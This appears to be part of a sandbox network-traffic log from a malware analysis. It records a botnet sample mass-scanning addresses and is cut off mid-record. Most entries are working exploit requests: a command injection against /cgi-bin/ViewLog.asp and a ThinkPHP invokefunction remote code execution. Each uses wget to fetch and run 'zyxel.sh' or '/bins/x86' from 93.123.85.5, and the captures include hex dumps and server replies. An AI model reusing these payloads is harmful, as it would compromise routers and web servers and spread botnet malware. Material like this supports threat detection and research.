                                                              Nov 13, 2023 22:20:22.544171095 CET17681OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              914192.168.2.235125494.177.10.848080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:22.546632051 CET17681OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:22.892488956 CET17734INHTTP/1.1 200 OK
                                                              Server: Virtual Web 0.9
                                                              Set-Cookie: SessionID=; path=/
                                                              Content-Type: text/html
                                                              Content-Length: 151
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 27 6a 61 76 61 73 63 72 69 70 74 27 3e 70 61 72 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 22 2f 6c 6f 67 69 6e 2e 68 74 6d 22 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><meta HTTP-EQUIV="Pragma" CONTENT="no-cache"><script language='javascript'>parent.location="/login.htm"</script></head><body></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              915192.168.2.2357558112.125.137.980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:23.075362921 CET17789OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:23.389810085 CET17799INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:17:01 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              916192.168.2.2342024112.197.147.1380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:23.148891926 CET17791OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:23.536763906 CET17801INHTTP/1.0 400 Bad Request
                                                              Date: Tue, 14 Nov 2023 04:20:23 GMT
                                                              Server: Boa/0.94.14rc21
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Content-Type: text/html; charset=ISO-8859-1
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              917192.168.2.2346210112.125.149.23280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:23.386580944 CET17798OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:23.697642088 CET17805INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:14:43 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              918192.168.2.2333750112.74.173.8280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:23.481020927 CET17801OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:23.815798998 CET17839INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.20.1
                                                              Date: Mon, 13 Nov 2023 21:20:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 157
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              919192.168.2.2340956112.124.63.15880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.134799004 CET18026OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:25.456626892 CET18035INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              92192.168.2.235109094.110.14.728080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.123867989 CET3055OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              920192.168.2.233314431.33.10.2168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.226047039 CET18028OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:28.226075888 CET18398OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              921192.168.2.235253231.136.162.298080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.258198023 CET18031OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:28.482019901 CET18403OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:34.625209093 CET19148OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:46.655627966 CET20532OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:10.716478109 CET20706OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              922192.168.2.235966694.122.115.2548080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.273169994 CET18032OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              923192.168.2.235060631.200.37.48080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.276571035 CET18033OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              924192.168.2.2356410112.140.201.21180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.457582951 CET18036OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:25.781960011 CET18052INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              925192.168.2.233401431.136.239.798080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.585767984 CET18038OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:26.594280005 CET18159OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:28.578072071 CET18405OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:32.577487946 CET18903OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:40.512482882 CET19891OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:56.382509947 CET20689OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:29.146059036 CET20716OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
